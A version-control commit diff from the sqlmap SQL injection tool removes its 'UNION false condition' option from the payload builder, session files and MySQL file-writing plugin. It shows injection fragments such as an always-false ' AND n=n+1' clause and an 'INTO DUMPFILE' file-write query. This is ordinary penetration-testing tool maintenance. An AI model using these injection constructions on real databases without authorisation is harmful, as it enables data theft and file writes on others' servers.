Got rid of UNION false cond

2024-11-22 09:36:35 +03:00 · 2010-12-05 16:16:15 +00:00 · 2010-12-05 16:16:15 +00:00 · 17449754fe
commit 17449754fe
parent a1e89d3e94
7 changed files with 8 additions and 50 deletions
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@ -49,7 +49,7 @@ class Agent:

        return query

-    def payload(self, place=None, parameter=None, value=None, newValue=None, negative=False, falseCond=False):
+    def payload(self, place=None, parameter=None, value=None, newValue=None, negative=False):
        """
        This method replaces the affected parameter with the SQL
        injection statement to request
@ -64,9 +64,6 @@ class Agent:

        if negative or kb.unionNegative:
            negValue = "-"
-        elif falseCond or kb.unionFalseCond:
-            randInt = randomInt()
-            falseValue = " AND %d=%d" % (randInt, randInt + 1)

        # After identifing the injectable parameter
        if kb.injection.place == PLACE.UA and kb.injection.parameter:
--- a/lib/core/option.py
+++ b/lib/core/option.py
@ -1182,7 +1182,6 @@ def __setKnowledgeBaseAttributes():
    kb.unionCount      = None
    kb.unionPosition   = None
    kb.unionNegative   = False
-    kb.unionFalseCond  = False
    kb.userAgents      = None
    kb.valueStack      = []
    kb.redirectSetCookie = None
--- a/lib/core/session.py
+++ b/lib/core/session.py
@ -203,7 +203,7 @@ def setTimeBased(place, parameter, payload):
    if condition:
        dataToSessionFile("[%s][%s][%s][Time-based blind injection][%s]\n" % (conf.url, place, safeFormatString(conf.parameters[place]), payload))

-def setUnion(comment=None, count=None, position=None, negative=False, falseCond=False, char=None, payload=None):
+def setUnion(comment=None, count=None, position=None, negative=False, char=None, payload=None):
    """
    @param comment: union comment to save in session file
    @type comment: C{str}
@ -260,18 +260,6 @@ def setUnion(comment=None, count=None, position=None, negative=False, falseCond=

        kb.unionNegative = True

-    if falseCond:
-        condition = (
-                      not kb.resumedQueries or ( kb.resumedQueries.has_key(conf.url) and
-                      ( not kb.resumedQueries[conf.url].has_key("Union false condition")
-                      ) )
-                    )
-
-        if condition:
-            dataToSessionFile("[%s][%s][%s][Union false condition][Yes]\n" % (conf.url, kb.injection.place, safeFormatString(conf.parameters[kb.injection.place])))
-
-        kb.unionFalseCond = True
-
    if char:
        condition = (
                      not kb.resumedQueries or ( kb.resumedQueries.has_key(conf.url) and
@ -475,12 +463,6 @@ def resumeConfKb(expression, url, value):
        logMsg = "resuming union negative from session file"
        logger.info(logMsg)

-    elif expression == "Union false condition" and url == conf.url:
-        kb.unionFalseCond = True if value[:-1] == "Yes" else False
-
-        logMsg = "resuming union false condition from session file"
-        logger.info(logMsg)
-
    elif expression == "Union char" and url == conf.url:
        conf.uChar = value[:-1]

--- a/lib/request/inject.py
+++ b/lib/request/inject.py
@ -392,10 +392,8 @@ def getValue(expression, blind=True, inband=True, error=True, fromUser=False, ex
                warnMsg += "technique, sqlmap is going blind"
                logger.warn(warnMsg)

-        oldParamFalseCond   = kb.unionFalseCond
-        oldParamNegative    = kb.unionNegative
-        kb.unionFalseCond   = False
-        kb.unionNegative    = False
+        oldParamNegative = kb.unionNegative
+        kb.unionNegative = False

        if error and kb.errorTest and not value:
            kb.technique = 2
@ -411,8 +409,7 @@ def getValue(expression, blind=True, inband=True, error=True, fromUser=False, ex
            kb.technique = 1
            value = __goInferenceProxy(expression, fromUser, expected, batch, resumeValue, unpack, charsetType, firstChar, lastChar)

-        kb.unionFalseCond = oldParamFalseCond
-        kb.unionNegative  = oldParamNegative
+        kb.unionNegative = oldParamNegative

        if value and isinstance(value, basestring):
            value = value.strip()
--- a/lib/techniques/inband/union/test.py
+++ b/lib/techniques/inband/union/test.py
@ -19,7 +19,7 @@ from lib.core.unescaper import unescaper
 from lib.parse.html import htmlParser
 from lib.request.connect import Connect as Request

-def __unionPosition(negative=False, falseCond=False, count=None, comment=None):
+def __unionPosition(negative=False, count=None, comment=None):
    validPayload = None

    if count is None:
@ -36,7 +36,7 @@ def __unionPosition(negative=False, falseCond=False, count=None, comment=None):

        # Forge the inband SQL injection request
        query = agent.forgeInbandQuery(randQueryUnescaped, exprPosition, count=count, comment=comment)
-        payload = agent.payload(newValue=query, negative=negative, falseCond=falseCond)
+        payload = agent.payload(newValue=query, negative=negative)

        # Perform the request
        resultPage, _ = Request.queryPage(payload, content=True)
@ -72,18 +72,6 @@ def __unionConfirm(count=None, comment=None):
            # (single entry) inband SQL injection position with negative
            # parameter validPayload
            if not isinstance(kb.unionPosition, int):
-                # NOTE: disable false condition for the time being, in the
-                # end it produces the same as prepending the original
-                #  parameter value with a minus (negative)
-                #validPayload = __unionPosition(falseCond=True, count=count, comment=comment)
-                #
-                # Assure that the above function found the exploitable partial
-                # (single entry) inband SQL injection position by appending
-                # a false condition after the parameter validPayload
-                #if not isinstance(kb.unionPosition, int):
-                #    return None
-                #else:
-                #    setUnion(falseCond=True)
                return None
            else:
                setUnion(negative=True)
--- a/lib/techniques/inband/union/use.py
+++ b/lib/techniques/inband/union/use.py
@ -57,7 +57,7 @@ def unionUse(expression, direct=False, unescape=True, resetCounter=False, nullCh
        expression = agent.concatQuery(expression, unpack)
        expression = unescaper.unescape(expression)

-    if ( kb.unionNegative or kb.unionFalseCond ) and not direct:
+    if kb.unionNegative and not direct:
        _, _, _, _, _, expressionFieldsList, expressionFields = agent.getFields(origExpr)

        # We have to check if the SQL query might return multiple entries
--- a/plugins/dbms/mysql/filesystem.py
+++ b/plugins/dbms/mysql/filesystem.py
@ -88,17 +88,12 @@ class Filesystem(GenericFilesystem):

        unionTest()

-        oldParamFalseCond = kb.unionFalseCond
-        kb.unionFalseCond = True
-
        debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile)
        logger.debug(debugMsg)

        sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, dFile)
        unionUse(sqlQuery, direct=True, unescape=False, nullChar="''")

-        kb.unionFalseCond = oldParamFalseCond
-
        if confirm:
            self.askCheckWrittenFile(wFile, dFile, fileType)